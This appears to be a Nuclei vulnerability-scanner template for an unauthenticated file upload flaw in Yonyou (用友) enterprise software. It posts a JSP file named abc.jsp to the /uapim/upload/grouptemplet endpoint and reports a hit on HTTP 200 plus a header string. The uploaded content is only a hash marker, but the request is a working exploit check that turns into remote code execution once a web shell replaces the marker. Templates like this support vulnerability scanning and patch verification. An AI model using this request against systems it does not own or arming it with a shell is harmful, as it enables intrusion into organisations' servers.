id: yongyou-grouptemplet-upload

info:
  name: 用友grouptemplet文件上传
  author: Str1am
  severity: critical
  tags: yongyou,upload

requests:
  - raw:
      - |
        POST /uapim/upload/grouptemplet?groupid=3&fileType=jsp HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Length: 198
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7xAs1xFvk4lUjuhF

        ------WebKitFormBoundary7xAs1xFvk4lUjuhF
        Content-Disposition: form-data; name="upload"; filename="abc.jsp"
        Content-Type: application/octet-stream

        202cb962ac59075b964b07152d234b70
        ------WebKitFormBoundary7xAs1xFvk4lUjuhF--

        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "invalid+port+number"
        part: header
        condition: and